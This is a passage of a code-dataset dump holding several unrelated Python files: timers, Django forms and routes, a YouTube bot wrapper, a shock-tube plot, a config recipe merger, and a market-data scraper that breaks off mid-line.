self.__seconds\n self.__run = True\n while counter > 0:\n counter -= __in\n sleep(__in)\n if not self.__run: # 定时器被复位\n return\n if not self.__run:\n return\n self.__callback(**self.__kwargs)\n\n def reset(self):\n \"\"\"\n 停止计时、复位定时器。若定时器已触发,则无任何效果。\n \"\"\"\n self.__run = False\n","sub_path":"atimer.py","file_name":"atimer.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"73741585","text":"from django import forms\nfrom django.forms import ValidationError\n\nclass 
MobileAuthForm(forms.Form):\n pnr = forms.CharField(max_length = 12, \n help_text=\"Enter your Personal Number without whitespaces or hyphen('-')\", \n widget=forms.TextInput(attrs={'placeholder': 'yyyymmddnnnn'}), \n label = '',\n required = True\n )\n\n def clean(self):\n cleaned_data = self.cleaned_data\n pnr = cleaned_data.get('pnr', None)\n\n if len(pnr) < 12:\n raise forms.ValidationError(\"Please enter your correct Personal Number\")\n\n if '-' in pnr or \" \" in pnr:\n raise forms.ValidationError(\"Please remove whitespaces and hyphens('-') in your Personal Number input\")\n","sub_path":"bankid_sign/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"231279948","text":"# This project created by urhoba\n# www.urhoba.net\n\nfrom telegram import user\nfrom YouTubeManager import YouTubeManager\nfrom DBManager import DBManager\n\nclass UrhobA:\n#region Init \n def __init__(self) -> None:\n self.yt = YouTubeManager()\n self.dbMan = DBManager()\n if self.dbMan.CheckBotStatsWithID() == False:\n self.dbMan.AddBot()\n#endregion\n\n#region User Modules\n def CreateUser(self, userID, userName):\n if self.dbMan.CheckUserWithID(userID) == False:\n self.dbMan.AddUser(userID, userName)\n self.dbMan.BotUserCountUpdate()\n#endregion\n\n#region File Modules\n def DeleteFile(self, fileFolder):\n self.yt.DeleteFile(fileFolder)\n#endregion\n\n#region Counter Update Modules\n def SearchCountUpdateUser(self, userID, userName):\n if self.dbMan.CheckUserWithID(userID) == True:\n self.dbMan.UserSearchCountUpdate(userID)\n self.dbMan.BotSearchCountUpdate()\n else:\n self.CreateUser(userID, userName)\n \n def VideoDownloadCountUpdateUser(self, userID, userName):\n if self.dbMan.CheckUserWithID(userID) == True:\n self.dbMan.UserVideoDownloadCountUpdate(userID)\n self.dbMan.BotVideoCountUpdate()\n else:\n self.CreateUser(userID, userName)\n\n def AudioDownloadCountUpdateUser(self, userID, userName):\n if self.dbMan.CheckUserWithID(userID) == True:\n self.dbMan.UserAudioDownloadCountUpdate(userID)\n self.dbMan.BotAudioCountUpdate()\n else:\n self.CreateUser(userID, userName)\n#endregion\n\n#region Search Modules \n def SearchVideo(self, searchQuery):\n result = self.yt.SearchVideo(searchQuery)\n return result\n#endregion\n\n#region Download Modules\n def DownloadVideo(self, video_id):\n result = self.yt.DownloadVideo(video_id)\n if result == False:\n return False\n else:\n if self.dbMan.CheckVideoWithVideoID(video_id):\n self.dbMan.VideoDownloadCountUpdate(video_id)\n else:\n self.dbMan.AddVideo(result[0], result[1], result[2])\n return result[2]\n\n def DownloadAudio(self, video_id):\n result = self.yt.DownloadAudio(video_id)\n if result == False:\n return False\n else:\n if self.dbMan.CheckAudioWithAudioID(video_id):\n self.dbMan.AudioDownloadCountUpdate(video_id)\n else:\n self.dbMan.AddAudio(result[0], result[1], result[2])\n return result[2]\n#endregion\n\n#region Get Stats Modules\n def GetBotDatas(self, botID = 1):\n if self.dbMan.CheckBotStatsWithID() == True:\n datas = self.dbMan.BotDataGet()\n return datas\n#endregion\n","sub_path":"Python/UrhobATelegramYouTube/Base.py","file_name":"Base.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"601100995","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as 
plt\n\n\ndatos=np.genfromtxt('data.dat')\nXD=datos[:,0]\nRHO=datos[:,1]\nPRESION=datos[:,2]\nVELOCIDAD=datos[:,3]\n\n# Analytical solution:\nL = 1.0\ng = 1.4\ndt = 0.001\n\nrho1 = 1.0\nrho2 = 0.125\nu1 = 0.0\nu2 = 0.0\np1 = 1.0\np2 = 0.1\n\nAl = 2./((g+1)*rho1)\nAr = 2./((g+1)*rho2)\nBl = ((g-1)/(g+1))*p1\nBr = ((g-1)/(g+1))*p2\nal = (g*p1/rho1)**0.5\nar = (g*p2/rho2)**0.5\n\ndef F(p):\n    return F_shock(p) + F_rare(p) + u2 - u1\n\ndef F_shock(p):\n    return (p-p2)*(Ar/(p+Br))**0.5\n\ndef F_rare(p):\n    return (2.0*al/(g-1))*((p/p1)**(0.5*(g-1)/g)-1)\n\ndef US(p):\n    return 0.5*(u1 + u2 + F_shock(p) - F_rare(p))\n\ndef Fprime(p):\n    return (al/(g*p1))*((p1/p)**((g+1)/(2.*g))) + ((Ar/(p+Br))**0.5)*((p2-p)/(2.*(p+Br)) + 1.)\n\ndef NR(p):\n    # Newton-Raphson: iterate while the relative change still exceeds the tolerance\n    pa = p\n    pn = pa - F(pa)/Fprime(pa)\n    CHA = abs(pn - pa)/(0.5*(pn + pa))\n    while(CHA > 10E-6):\n        pa = pn\n        pn = pa - F(pa)/Fprime(pa)\n        CHA = abs(pn - pa)/(0.5*(pn + pa))\n\n    return pn\n\ndef Solucion():\n\n    p0 = 0.315\n\n    Ps = NR(p0)\n    Us = US(Ps)\n    RhoSL = rho1*(Ps/p1)**(1./g)\n    aSL = al*(Ps/p1)**((g-1)/(2.*g))\n    SHL = u1 - al\n    STL = Us - aSL\n    RhoSR = rho2*(((Ps/p2)+((g-1.)/(g+1.)))/(((g-1.)/(g+1.))*(Ps/p2) + 1.))\n    SR = u2 + ar*((((g+1)/(2.*g))*(Ps/p2)) + ((g-1.)/(2.*g)))**(0.5)\n\n    X = np.linspace(0,1,100)\n    P = np.zeros(100)\n    Rho = np.zeros(100)\n    U = np.zeros(100)\n\n    t=0\n    run = True\n    \n    while(run == True):\n        t = t + dt\n        for i in range(1,100):\n            p = 0\n            r = 0\n            u = 0 \n            x = X[i] - 0.5\n            xt = x/t\n\n            if(xt <= SHL):\n                p = p1\n                r = rho1\n                u = u1\n            elif(SHL < xt <= STL):\n                p = p1*((2./(g+1.)) + (g-1.)/(al*(g+1))*(u1 - xt))**((2.*g)/(g-1.))\n                r = rho1*((2./(g+1.)) + (g-1.)/(al*(g+1))*(u1 - xt))**(2./(g-1.))\n                u = (2./(g+1.))*(al + ((g-1)*u1)/2. + xt)\n            elif(STL < xt <= Us):\n                p = Ps\n                r = RhoSL\n                u = Us\n            elif(Us < xt <= SR):\n                p = Ps\n                r = RhoSR\n                u = Us\n            else:\n                p = p2\n                r = rho2\n                u = u2\n            \n            P[i] = p\n            Rho[i] = r\n            U[i] = u\n\n        if(abs(U[90]-U[89]) > 0):\n            run = False\n    \n    return P,Rho,U,X\n\n\nPA, RA, UA, XA = Solucion()\n\nplt.subplot(311)\nplt.scatter(XD,PRESION,color='yellow',label='Computacional')\nplt.plot(XA,PA,color='black',label='Analitica')\nplt.title(\"Presion\")\nplt.legend()\n\nplt.subplot(312)\nplt.scatter(XD,RHO,color='green',label='Computacional')\nplt.plot(XA,RA,color='black',label='Analitica')\nplt.title(\"Densidad\")\nplt.legend()\n\nplt.subplot(313)\nplt.scatter(XD,VELOCIDAD,color='pink',label='Computacional')\nplt.plot(XA,UA,color='black',label='Analitica')\nplt.title(\"Velocidad\")\nplt.legend()\n\nplt.savefig(\"Graficas.pdf\")\nplt.show()\n \n\n\n\n\n\n","sub_path":"grf.py","file_name":"grf.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
+{"seq_id":"388894338","text":"\"\"\"\r\nRecipe merging follows very different rules from the other \r\nconfig files. \r\n\r\nWhile some of it can be abstracted to use the same machinery, \r\nit is easier to just rewrite (most) of the logic and handle\r\nthe differences manually. It can be refactored later if need\r\nbe.\r\n\r\nThe high level approach to merging recipes uses basically\r\nthe same logic as other merge scripts, with the recipe name\r\nas the 'key' and the steps within the recipe as the 'value'. \r\nThe biggest difference is migrating a user's custom recipes \r\nfrom their old file to the new one. \r\n\r\nThe biggest challenge with this process is ensuring that all\r\nglobal names are actually valid. 
The easiest way to do this \r\nrequires having a copy of the logger settings file, which \r\ncontains all global names. This requires an extra command \r\nline argument, which doesn't play nicely with the \r\nrest of the cli, and requires special handling in merge.py. \r\n\r\nThe way I decided to do this was to use parse_known_args()\r\ninstead of parse_args(), and attach the remainder of the \r\nun-parsed arguments to the options object. This file can\r\nthen use a second parser on the remaining argument(s) to\r\nextract the logger settings file reference. \r\n\r\nOne subtlety that arises is that there doesn't seem to be a \r\nrestriction on recipe names, so we need to check for duplicate\r\nnames in the recipe list and bail if we encounter that. Since\r\nonly a super dumb ass would actually do that, this shouldn't\r\nbe a problem for real-world, but is trivial to implement. \r\n\r\n\"\"\"\r\n\r\nimport argparse\r\nfrom cfg_compare import Merger\r\nfrom collections import OrderedDict\r\nfrom exceptions import SanityError\r\nfrom itertools import zip_longest\r\n\r\n\r\nclass BaseStep():\r\n def __init__(self, var):\r\n self.var = var\r\n\r\n def tostr(self):\r\n raise NotImplementedError()\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, self.__class__):\r\n return NotImplemented\r\n return self.tostr() == other.tostr()\r\n\r\n\r\nclass WaitStep(BaseStep):\r\n def __init__(self, time, unit):\r\n super().__init__(None)\r\n self.time = time\r\n self.unit = unit\r\n\r\n def tostr(self):\r\n return \"Wait %s %s\" % (self.time, self.unit)\r\n\r\n\r\nclass WaitUntilStep(BaseStep):\r\n def __init__(self, var, op, val):\r\n super().__init__(var)\r\n self.op = op\r\n self.val = val\r\n\r\n def tostr(self):\r\n return \"Wait until \\\"%s\\\" %s %s\"%(self.var, self.op, self.val)\r\n\r\n\r\nclass SetStep(BaseStep):\r\n def __init__(self, var, val):\r\n super().__init__(var)\r\n self.val = val\r\n\r\n def tostr(self):\r\n return \"Set \\\"%s\\\" to %s\"%(self.var, self.val)\r\n\r\n\r\nclass Recipe():\r\n def __init__(self, name, lines):\r\n self.name = name\r\n self.lines = lines\r\n self.steps = []\r\n for l in lines:\r\n self.create_step(l)\r\n\r\n def steps_with_vars(self):\r\n for step in self:\r\n if step.var is not None:\r\n yield step\r\n\r\n @classmethod\r\n def EmptyRecipe(cls):\r\n return cls(\"\", [])\r\n\r\n def empty(self):\r\n return len(self.steps) == 0\r\n\r\n def __iter__(self):\r\n return iter(self.steps)\r\n\r\n def create_step(self, l):\r\n\r\n # fancy unpacking is like cheating\r\n # for splitting and rejoining strings\r\n # with known beginning and middle but\r\n # unknown number of middle segments. \r\n # otherwise you'd need a bunch of code\r\n # or a regex to do this so easily\r\n\r\n svar = None\r\n if l.startswith(\"Wait\"):\r\n if l.startswith(\"Wait until\"):\r\n _, _, *var, op, val = l.split()\r\n svar = \" \".join(var)\r\n s = WaitUntilStep(svar.strip('\"'), op, val)\r\n else:\r\n try:\r\n _, time, unit = l.split()\r\n except ValueError:\r\n # malformed line e.g. 
\"Wait 260seconds\"\r\n raise SanityError(\"Malformed wait step: \\\"%s\\\"\"%l) from None\r\n s = WaitStep(time, unit)\r\n elif l.startswith(\"Set\"):\r\n _, *var, _, val = l.split()\r\n svar = \" \".join(var)\r\n s = SetStep(svar.strip('\"'), val)\r\n else:\r\n raise SanityError(\"Unknown step type for line: '%s'\"%l)\r\n\r\n if svar is not None and (svar[0] != '\"' or svar[-1] != '\"'):\r\n raise SanityError(\"Parse failed for line: '%s'\"%l)\r\n\r\n self.steps.append(s)\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, self.__class__):\r\n return NotImplemented\r\n if self.name != other.name:\r\n return False\r\n return self.steps == other.steps\r\n\r\ndef _parse_recipes(recipes, lit, ff):\r\n while True:\r\n l = next(lit)\r\n if l == \"\":\r\n continue\r\n func, name = l.split(\" \", 1)\r\n if func != \"Func\":\r\n raise SanityError(\"malformed file: '%s'\"%ff)\r\n lines = []\r\n while True:\r\n l = next(lit, None)\r\n if not l:\r\n break\r\n lines.append(l)\r\n if not lines:\r\n continue\r\n #raise SanityError(\"Empty recipe in '%s': '%s'\"%(ff, name))\r\n recipes[name] = Recipe(name, lines)\r\n\r\n\r\ndef _parse_logger(ff):\r\n # no sanity checking here since the\r\n # logger settings file is just for \r\n # reference, not validation. \r\n # Just don't retard. \r\n with open(ff, 'r') as f:\r\n _ = f.readline() # header\r\n lines = f.read().splitlines()\r\n settings = set()\r\n for l in lines:\r\n name, _ = l.split(\"\\t\", 1)\r\n settings.add(name)\r\n return settings\r\n\r\n\r\nclass RecipeMerger(Merger):\r\n\r\n def parse(self, ff):\r\n with open(ff, 'r') as f:\r\n lines = f.read().splitlines()\r\n recipes = OrderedDict()\r\n lit = iter(lines)\r\n try:\r\n _parse_recipes(recipes, lit, ff)\r\n except StopIteration:\r\n pass\r\n return recipes\r\n\r\n def notfound(self, recipe):\r\n if self.options.ignore_deleted and recipe not in self.options.never_ignore:\r\n if recipe in self.of and not recipe in self.cf:\r\n cs = \"???\"\r\n os = self.v2s(recipe, self.getvar(self.of, recipe))\r\n ns = \"\"\r\n m = \"ignore\"\r\n a = \"ignore\"\r\n self.setvar(self.nf, recipe, Recipe.EmptyRecipe())\r\n return cs, os, ns, m, a\r\n\r\n def sanitycheck(self):\r\n\r\n # other sanity checking is done during\r\n # the parsing phase\r\n out = self.options.v\r\n def check(file, fn, warning=False):\r\n for recipe in file.values():\r\n for i, step in enumerate(recipe.steps, 1):\r\n if step.var is None:\r\n continue\r\n if step.var not in self.settings:\r\n if warning:\r\n out(\"Unknown variable '%s' in recipe '%s' line %d\"%(step.var, recipe.name, i))\r\n else:\r\n raise SanityError(\"Invalid variable '%s' in file '%s'\"%(step.var, fn))\r\n def checkvars(container):\r\n for var in container:\r\n if var not in self.settings:\r\n raise SanityError(\"Bad variable name: '%s'\"%var)\r\n check(self.cf, 'user', True)\r\n check(self.of, 'old')\r\n check(self.nf, 'new')\r\n checkvars(self.options.translate_new)\r\n checkvars(self.options.use_new)\r\n checkvars(self.options.use_user)\r\n checkvars(self.options.force)\r\n\r\n def convert_vars(self, f):\r\n \r\n # translate renamed variables to \r\n # their new names and remove any\r\n # depreciated variables. \r\n # Issue a warning whenever a depreciated\r\n # variable step is removed from a recipe\r\n\r\n # make a copy of the list for iteration\r\n # and remove steps from the original when\r\n # identified. Mutate step.var in place \r\n # when translating names. 
\r\n\r\n told = self.options.translate_old\r\n depr = self.options.depreciated\r\n out = self.options.v\r\n for recipe in f.values():\r\n steps = recipe.steps.copy()\r\n for j, step in enumerate(steps, 1):\r\n var = step.var\r\n if var in depr:\r\n out(\"Removing '%s' step %d with depreciated variable: '%s'\"%(recipe.name, j, var))\r\n recipe.steps.remove(step)\r\n else:\r\n var = told.get(var, None) # get told\r\n if var is not None:\r\n out(\"Translating '%s' step %d '%s' -> '%s'\"%(recipe.name, j, step.var, var))\r\n step.var = var\r\n\r\n def post_parse(self):\r\n \"\"\" Load the settings file and use\r\n the translate_old dict to translate names\r\n now rather than waiting. \r\n\r\n When the files are sanity checked, they will\r\n all have the updated variable names (assuming\r\n of course that the patch file is correct :). \r\n \"\"\"\r\n self.settings = _parse_logger(self.options.loggersettings)\r\n self.convert_vars(self.cf)\r\n self.convert_vars(self.of)\r\n\r\n def _merge(self):\r\n \"\"\"\r\n The merge logic here is somewhat different from\r\n the standard, since we expect customers to have\r\n their own custom recipes. \r\n\r\n Perform merge in two passes:\r\n 1. Fix the standard recipes by running through\r\n the default merge logic.\r\n\r\n 2. Loop through customer's file for any non-default\r\n recipes and merge them into the new file. Skip \r\n a recipe IF:\r\n * The user's copy is present in the old reference\r\n * The user's copy is not present in the new reference\r\n * the user's copy matches the old reference\r\n \"\"\"\r\n super()._merge()\r\n cf = self.cf\r\n of = self.of\r\n nf = self.nf\r\n ol = self.outlogger.lines\r\n for name in cf:\r\n if name in nf:\r\n continue\r\n elif name in of:\r\n cv = cf[name]\r\n if cv == of[name]:\r\n ol.append((name, \"\", \"\", \"\", \"deprec\", \"skip\"))\r\n continue\r\n else:\r\n ol.append((name, \"\", \"\", \"N N\", \"user\"))\r\n nf[name] = cv\r\n else:\r\n ol.append((name, \"\", \"\", \"\", \"custom\", \"user\"))\r\n nf[name] = cf[name]\r\n\r\n\r\n def v2s(self, name, v):\r\n return \"Recipe('%s')\"%v.name\r\n\r\n def output(self, f):\r\n buf = []\r\n for name, recipe in f.items():\r\n if recipe.empty():\r\n continue\r\n buf.append(\"Func %s\"%name)\r\n for step in recipe:\r\n buf.append(step.tostr())\r\n buf.append(\"\")\r\n buf.append(\"\") # files end with two blanks for some reason\r\n return \"\\n\".join(buf)\r\n\r\n\r\ndef merge_recipes(options):\r\n p = argparse.ArgumentParser()\r\n p.add_argument(\"--loggersettings\")\r\n p.add_argument(\"--ignore-deleted\", action=\"store_true\")\r\n p.add_argument(\"--never-ignore\")\r\n args, other = p.parse_known_args(options.other)\r\n options.loggersettings = args.loggersettings\r\n options.other = other\r\n options.ignore_deleted = args.ignore_deleted\r\n\r\n if args.never_ignore:\r\n never_ignore = args.never_ignore.split(\";\")\r\n options.never_ignore = set(never_ignore)\r\n else:\r\n options.never_ignore = set()\r\n\r\n return RecipeMerger(options).merge()\r\n\r\n\r\nfrom file_types import register\r\nregister(\"recipes\", merge_recipes)","sub_path":"tools/patcher/src/merge/mergers/merge_recipes.py","file_name":"merge_recipes.py","file_ext":"py","file_size_in_byte":11703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"178977214","text":"from curses import wrapper\nfrom curses.textpad import Textbox, rectangle\nimport curses\nimport time\n\ndef main(output):\n ouput = curses.initscr()\n field = curses.newwin(2, 
curses.COLS, curses.LINES - 3, 0)\n curses.start_color()\n curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)\n curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_YELLOW)\n output.bkgd(curses.color_pair(1))\n field.bkgd(curses.color_pair(2))\n box = Textbox(field)\n box.edit()\n\nif __name__ == \"__main__\":\n wrapper(main)\n","sub_path":"client/cursestest.py","file_name":"cursestest.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"187053645","text":"import socket\nimport os\n\n\ndef ips(hostnames):\n result = []\n hostnames = hostnames.split(',')\n for v in hostnames:\n if v == '':\n continue\n try:\n socket.inet_aton(v) # test legal IP\n result.append(v)\n except socket.error as e1: # Not legal IP\n print(e1)\n try:\n ip = socket.gethostbyname(v) # returns the IP unchanged for an IP\n result.append(ip)\n except Exception as e:\n print(e)\n return result\n\nKEYSPACE = os.getenv('DRASTIC_KEYSPACE', 'drastic')\nLOG_LEVEL = os.getenv('DRASTIC_LOG_LEVEL', 'WARN')\nCASSANDRA_HOSTS = ips(os.getenv('CASSANDRA_HOSTNAMES', 'cassandra-1'))\nREPLICATION_FACTOR = int(os.getenv('CASSANDRA_REPLICATION_FACTOR', '2'))\nCONSISTENCY_LEVEL = int(os.getenv('CASSANDRA_CONSISTENCY_LEVEL', '2'))\n\nif __name__ == '__main__':\n print('hosts: {0}'.format(str(CASSANDRA_HOSTS)))\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"418871630","text":"from django.conf.urls import patterns, url\n\nfrom discover import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^like/$', views.like, name='like'),\n url(r'^dislike/$', views.dislike, name='dislike'),\n)\n\n","sub_path":"discover/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"504129982","text":"from requests_html import HTMLSession\nimport os\nfrom os import path\nimport json\nfrom bs4 import BeautifulSoup as bs\nimport xlrd\nfrom datetime import datetime\n# s = \"15-Jul-2020\"\n# f = \"%d-%b-%Y\"\n# out = datetime.strptime(date_string, \"%d/%m/%Y\").strftime(\"%d-%b-%Y\")\n# print(out)\n\n\ndef fetch(url, filename):\n try:\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Edg/83.0.478.45',\n 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'en-US,en;q=0.9'}\n\n # initialize the session\n session = HTMLSession()\n\n try:\n # make the HTTP request and retrieve response\n response = session.get(url)\n if(response.status_code == 200):\n # execute Javascript\n response.html.render(timeout=200000)\n\n # construct the soup parser\n soup = bs(response.html.html, \"html.parser\")\n print('Data Fetched from this ' + url)\n\n try:\n scrap(soup, filename)\n except Exception as e:\n print('Error - Data Scraping Failed ' +\n url + ' {}'.format(e))\n else:\n print(url)\n print('Site is not responding or internet is not availabe {}'.format(\n response.status_code))\n\n except Exception as e:\n print('Error - fetch Failed for ' + url + ' {}'.format(e))\n except Exception as e:\n print('Error - fetcher Failed for ' + url + ' {}'.format(e))\n\n\ndef file_fetch(url, filename):\n try:\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Edg/83.0.478.45',\n 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'en-US,en;q=0.9'}\n\n # initialize the session\n session = HTMLSession()\n\n try:\n # make the HTTP request and retrieve response\n response = session.get(url)\n if(response.status_code == 200):\n print('Data Fetched from this ' + url)\n try:\n scrap(response.content, filename)\n except Exception as e:\n print('Error - Data Scraping Failed ' +\n url + ' {}'.format(e))\n else:\n print(url)\n print(url + ' is not responding or internet is not availabe {}'.format(\n response.status_code))\n\n except Exception as e:\n print('Error - fetch Failed for ' + url + ' {}'.format(e))\n except Exception as e:\n print('Error - fetcher Failed for ' + url + ' {}'.format(e))\n\n\ndef scrap(soup, fileName):\n\n directory = \"./temp_data\"\n if(os.path.exists(directory) != True):\n os.mkdir(directory)\n\n if(fileName == 'cdsl-FII-DD'):\n rows = soup.findAll('tr') # Extract and return first occurrence of tr\n\n td0 = rows[0].find_all('td')\n td1 = rows[1].find_all('td')\n td14 = rows[14].find_all('td')\n\n # for td in td0:\n # print(td.get_text())\n # for td in td1:\n # print(td.get_text())\n note = td14[0].get_text()\n note = note.replace(\"\\n\", \"\").replace(\" \", \"\").replace(\n \"\\r\", \"\").replace(\" \", \"\").strip()\n\n data1 = {\"Date\": datetime.strptime(td1[0].get_text(), \"%d-%b-%Y\").strftime(\"%d-%b-%Y\"),\n \"Equity\": {\"Stock Exchange\":\n {\"Gross Purchases (Rs Crore)\": td1[3].get_text(),\n \"Gross Sales (Rs Crore)\": td1[4].get_text(),\n \"Net Investment (Rs Crore)\": td1[5].get_text()}},\n \"Note\": note}\n\n # print(data1)\n\n with open(directory+'/'+fileName+'-table1.json', 'w') as f:\n json.dump(data1, f)\n\n ##\n # Second table\n ##\n\n td0 = rows[15].find_all('td')\n td1 = rows[16].find_all('td')\n td2 = rows[17].find_all('td')\n td3 = rows[18].find_all('td')\n td4 = rows[19].find_all('td')\n td5 = rows[20].find_all('td')\n td6 = rows[21].find_all('td')\n td7 = rows[22].find_all('td')\n\n # print('------------------------------')\n # for td in td0:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td1:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td2:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td3:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td4:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td5:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td6:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td7:\n # print(td.get_text())\n # print('------------------------------')\n\n note = td7[0].get_text()\n note = note.replace(\"\\n\", \"\").replace(\n \"\\r\", \"\").replace(\" \", \"\").strip()\n\n data2 = {\"Date\": datetime.strptime(td2[0].get_text(), \"%d-%b-%Y\").strftime(\"%d-%b-%Y\"),\n \"Buy\": {\"No of contract\":\n {\"Index Futures\": td2[2].get_text(),\n \"Index Options\": td3[2].get_text(),\n \"Stock Futures\": td4[2].get_text(),\n \"Stock Options\": td5[2].get_text(),\n \"Interest Rate Futures\": td6[2].get_text()\n },\n \"Amount in Crore\":\n {\"Index Futures\": td2[3].get_text(),\n \"Index Options\": td3[3].get_text(),\n \"Stock Futures\": td4[3].get_text(),\n \"Stock Options\": td5[3].get_text(),\n \"Interest Rate Futures\": td6[3].get_text()\n }},\n \"Sell\": {\"No of 
contract\":\n {\"Index Futures\": td2[4].get_text(),\n \"Index Options\": td3[4].get_text(),\n \"Stock Futures\": td4[4].get_text(),\n \"Stock Options\": td5[4].get_text(),\n \"Interest Rate Futures\": td6[4].get_text()\n },\n \"Amount in Crore\":\n {\"Index Futures\": td2[5].get_text(),\n \"Index Options\": td3[5].get_text(),\n \"Stock Futures\": td4[5].get_text(),\n \"Stock Options\": td5[5].get_text(),\n \"Interest Rate Futures\": td6[5].get_text()\n }},\n \"Open Interest at the end of the date\": {\"No of contract\":\n {\"Index Futures\": td2[6].get_text(),\n \"Index Options\": td3[6].get_text(),\n \"Stock Futures\": td4[6].get_text(),\n \"Stock Options\": td5[6].get_text(),\n \"Interest Rate Futures\": td6[6].get_text()\n },\n \"Amount in Crore\":\n {\"Index Futures\": td2[7].get_text(),\n \"Index Options\": td3[7].get_text(),\n \"Stock Futures\": td4[7].get_text(),\n \"Stock Options\": td5[7].get_text(),\n \"Interest Rate Futures\": td6[7].get_text()\n }},\n \"Note\": note}\n # prin(data2)\n with open(directory+'/'+fileName+'-table2.json', 'w') as f:\n json.dump(data2, f)\n\n if(fileName == 'bse-equity-CW-TO'):\n # Extract and return first occurrence of tr\n trs = soup.find(id='ContentPlaceHolder1_offTblBdyDII').find_all('tr')\n tds1 = trs[1]\n tdArray1 = []\n for td in tds1:\n try:\n tdArray1.append(td.get_text())\n except:\n pass\n trs = soup.find(id='offTblBdy').find_all('tr')\n tds2 = trs[0]\n tdArray2 = []\n for td in tds2:\n try:\n tdArray2.append(td.get_text())\n except:\n pass\n data1 = {\n \"Category\": tdArray1[0],\n \"Date\": datetime.strptime(tdArray1[1], \"%d/%m/%Y\").strftime(\"%d-%b-%Y\"),\n \"Buy Value\": tdArray1[2],\n \"Sale Value\": tdArray1[3],\n \"Net Value\": tdArray1[4],\n }\n with open(directory+'/'+fileName+'-table1.json', 'w') as f:\n json.dump(data1, f)\n\n data2 = {\n \"Date\": datetime.strptime(tdArray2[0], \"%d/%m/%Y\").strftime(\"%d-%b-%Y\"),\n \"Clients\": {\n \"Buy\": tdArray2[1],\n \"Sales\": tdArray2[2],\n \"Net\": tdArray2[3]\n },\n \"NRI\": {\n \"Buy\": tdArray2[4],\n \"Sales\": tdArray2[5],\n \"Net\": tdArray2[6]\n },\n \"Proprietary\": {\n \"Buy\": tdArray2[7],\n \"Sales\": tdArray2[8],\n \"Net\": tdArray2[9]\n }\n }\n # print(data2)\n with open(directory+'/'+fileName+'-table2.json', 'w') as f:\n json.dump(data2, f)\n\n if(fileName == 'equity-CM-CW-turnover'):\n with open(directory+'/'+fileName+'.xls', 'wb') as f:\n f.write(soup)\n\n # To open Workbook\n wb = xlrd.open_workbook(directory+'/'+fileName+'.xls')\n sheet = wb.sheet_by_index(0)\n\n # For row 0 and colom 0\n # print(sheet.cell_value(0, 0))\n if(sheet.cell_value(3, 1) == \"BNK\"):\n row_bnk = 3\n if(sheet.cell_value(4, 1) == \"DFI\"):\n row_dfi = 4\n else:\n row_dfi = None\n if(sheet.cell_value(4, 1) == \"PRO-TRADES\"):\n row_pro = 4\n if(sheet.cell_value(5, 1) == \"PRO-TRADES\"):\n row_pro = 5\n if(sheet.cell_value(5, 1) == \"OTHERS\"):\n row_other = 5\n if(sheet.cell_value(6, 1) == \"OTHERS\"):\n row_other = 6\n\n data = {\n \"Date\": datetime.strptime(sheet.cell_value(3, 0), \"%d-%b-%y\").strftime(\"%d-%b-%Y\"),\n \"Pro Trades\": {\n \"Buy Value (Rs. in Crores)\": sheet.cell_value(row_pro, 2),\n \"Sell Value (Rs. in Crores)\": sheet.cell_value(row_pro, 3),\n },\n \"Others Trades\": {\n \"Buy Value (Rs. in Crores)\": sheet.cell_value(row_other, 2),\n \"Sell Value (Rs. in Crores)\": sheet.cell_value(row_other, 3),\n },\n \"BNK&DFI\": {\n \"Buy Value (Rs. in Crores)\": sheet.cell_value(row_bnk, 2) + (sheet.cell_value(row_dfi, 2) if(row_dfi != None) else 0),\n \"Sell Value (Rs. 
